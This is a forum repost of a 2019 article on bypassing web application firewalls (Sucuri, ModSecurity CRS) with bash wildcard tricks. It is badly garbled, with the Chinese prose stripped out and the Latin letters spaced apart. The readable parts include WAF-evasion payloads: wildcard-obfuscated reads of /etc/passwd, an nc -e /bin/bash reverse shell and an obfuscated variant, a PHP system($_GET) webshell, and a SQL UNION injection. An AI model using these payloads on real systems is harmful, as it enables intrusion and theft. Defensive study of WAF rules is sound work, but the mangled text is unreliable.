搜索

[13638] 2019-01-11_Web应用程序防火墙(WAF)bypass技术讨论(一)

文档创建者:s7ckTeam
浏览次数:30
最后更新:2025-01-18
2019-01-11_Web应用程序防火墙(WAF)bypass技术讨论(一) W e b W A F b y p a s s   F r e e B u f   2 0 1 9 - 0 1 - 1 1 W e b R C E 2 0 1 7   O W A S P   T o p   1 0 S Q L N o S Q L O S L D A P 访 W e b R C E L i n u x b y p a s s   W A F 使 b a s h 使 b a s h m a n   7   g l o b b a s h 使 / 使 l s 使 / ? ? ? / ? s 使 W A F W A F G E T P O S T b o d y / e t c / p a s s w d / b i n / l s / ? c m d = c a t + / e t c / p a s s w d W A F I P 访 W A F / 使 p a y l o a d / ? c m d = % 2 f ? ? ? % 2 f ? ? t % 2 0 % 2 f ? ? ? % 2 f p ? ? s ? ?
3 / b i n / c a t   *   / ? ? ? / ? ? t / b i n / c a t / d e v / n e t / e t c / a p t 使 l s   * . ? ? ? 3 g i f . j p g . t x t 使 使 n e t c a t s h e l l 1 3 3 7 n c   - e   / b i n / b a s h   1 2 7 . 0 . 0 . 1   1 3 3 7 s h e l l 1 2 7 . 0 . 0 . 1 使 2 1 3 0 7 0 6 4 3 3 I P 1 2 7 . 0 . 0 . 1 H T T P 使 - e k a l i 使 n c . t r a d i t i o n a l n c 便 / b i n / b a s h p a y l o a d / b i n / n c   1 2 7 . 0 . 0 . 1   1 3 3 7 / ? ? ? / n ?   - e   / ? ? ? / b ? ? h   2 1 3 0 7 0 6 4 3 3   1 3 3 7 / ? ? ? / ? c . ? ? ? ? ? ? ? ? ? ? ?   - e   / ? ? ? / b ? ? h   2 1 3 0 7 0 6 4 3 3   1 3 3 7
b y p a s s / ? ? ? / n ?   2 1 3 0 7 0 6 4 3 3   1 3 3 7 /   ?   n   [ 0 - 9 ] / b i n / c a t   / e t c / p a s s w d b y p a s s / ? ? ? / ? ? t   / ? ? ? / ? ? s s ? ? /   ?   t   s ? 广 /     / W A F S Q L U N I O N + S E L E C T + 1 , 2 , 3 /   * 使 e c h o e c h o 使 e c h o   / / s s * R C E 使 便 使 W A F S u c u r i   W A F S u c u r i   W A F   b y p a s s
W A F P H P P H P 使 S u c u r i   W A F c / e t c / p a s s w d P H P 使 n e t c a t / ? ? ? / ? c s h e l l   c u r l w g e t W e b I P 使 W A F S u c u r i   W A F 西 S u c u r i 使 P H P W A F S u c u r i W A F w a f M o d S e c u r i t y   O W A S P   C R S   3 . 0 W A F h t t p s : / / g i t h u b . c o m / S p i d e r L a b s / o w a s p - m o d s e c u r i t y - c r s / b l o b / e 4 e 0 4 9 7 b e 4 d 5 9 8 c c e 0 e 0 a 8 f e f 2 0 d 1 f 1 e 5 5 7 8 c 8 d 0 / r u l e s / R E Q U E S T - 9 2 0 - P R O T O C O L - E N F O R C E M E N T . c o n f W A F P a r a n o i a   L e v e l   0   ( P L 0 ) 0 p a y l o a d < ? p h p             e c h o   ' o k :   ' ;             p r i n t _ r ( $ _ G E T [ ' c ' ] ) ;             s y s t e m ( $ _ G E T [ ' c ' ] ) ; #   - = [   T a r g e t s   a n d   A S C I I   R a n g e s   ] = - # #   9 2 0 2 7 0 :   P L 1 #   R E Q U E S T _ U R I ,   R E Q U E S T _ H E A D E R S ,   A R G S   a n d   A R G S _ N A M E S #   A S C I I :   1 - 2 5 5 #   E x a m p l e :   F u l l   A S C I I   r a n g e   w i t h o u t   n u l l   c h a r a c t e r # #   9 2 0 2 7 1 :   P L 2 #   R E Q U E S T _ U R I ,   R E Q U E S T _ H E A D E R S ,   A R G S   a n d   A R G S _ N A M E S #   A S C I I :   9 , 1 0 , 1 3 , 3 2 - 1 2 6 , 1 2 8 - 2 5 5 #   E x a m p l e :   F u l l   v i s i b l e   A S C I I   r a n g e ,   t a b ,   n e w l i n e # #   9 2 0 2 7 2 :   P L 3 #   R E Q U E S T _ U R I ,   R E Q U E S T _ H E A D E R S ,   A R G S ,   A R G S _ N A M E S ,   R E Q U E S T _ B O D Y #   A S C I I :   3 2 - 3 6 , 3 8 - 1 2 6 #   E x a m p l e :   V i s i b l e   l o w e r   A S C I I   r a n g e   w i t h o u t   p e r c e n t   s y m b o l # #   9 2 0 2 7 3 :   P L 4 #   A R G S ,   A R G S _ N A M E S   a n d   R E Q U E S T _ B O D Y #   A S C I I :   3 8 , 4 4 - 4 6 , 4 8 - 5 8 , 6 1 , 6 5 - 9 0 , 9 5 , 9 7 - 1 2 2 #   E x a m p l e :   A - Z   a - z   0 - 9   =   -   _   .   ,   :   & # #   9 2 0 2 7 4 :   P L 4 #   R E Q U E S T _ H E A D E R S   w i t h o u t   U s e r - A g e n t ,   R e f e r e r ,   C o o k i e #   A S C I I :   3 2 , 3 4 , 3 8 , 4 2 - 5 9 , 6 1 , 6 5 - 9 0 , 9 5 , 9 7 - 1 2 2 #   E x a m p l e :   A - Z   a - z   0 - 9   =   -   _   .   ,   :   &   "   *   +   /   S P A C E S e c A c t i o n   " i d : 9 9 9 , p h a s e : 1 , n o l o g , p a s s , t : n o n e , s e t v a r : t x . p a r a n o i a _ l e v e l = 0 "
M o d S e c u r i t y 1 n e t n e a h t t p s : / / w w w . n e t n e a . c o m / c m s / c o r e - r u l e - s e t - i n v e n t o r y / P a r a n o i a   L e v e l   1   a n d   2   ( P L 1 ,   P L 2 ) 1 2 使 P L 1 P L 2   M o d S e c u r i t y O S   F i l e   A c c e s s   A t t e m p t 9 3 0 1 2 0 W A F 9 2 0 2 7 1 9 2 0 2 7 2 使 使 b y p a s s   O S   F i l e   A c c e s s   A t t e m p t / e t c / p a s s w d P a r a n o i a   L e v e l   3   ( P L 3 ) n M e t a - C h a r a c t e r   A n o m a l y D e t e c t i o n   A l e r t R e p e t i t i v e   N o n - W o r d   C h a r a c t e r s M o d S e c u r i t y w e b 使 使 p a s s w d S e c A c t i o n   " i d : 9 9 9 , p h a s e : 1 , n o l o g , p a s s , t : n o n e , s e t v a r : t x . p a r a n o i a _ l e v e l = 1 "
使 3 W A F 3 使 4 P a r a n o i a   L e v e l   4   ( P L 4 ) a - z   A - Z   0 9 9 0 H T M L W e b W A F 使 W e b W A F W A F M o d S e c u r i t y S e c R u l e b y p a s s / * m e d i u m ; F r e e B u f . C O M c = / ? i n / c a t + / e t ? / p a s s w ?

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理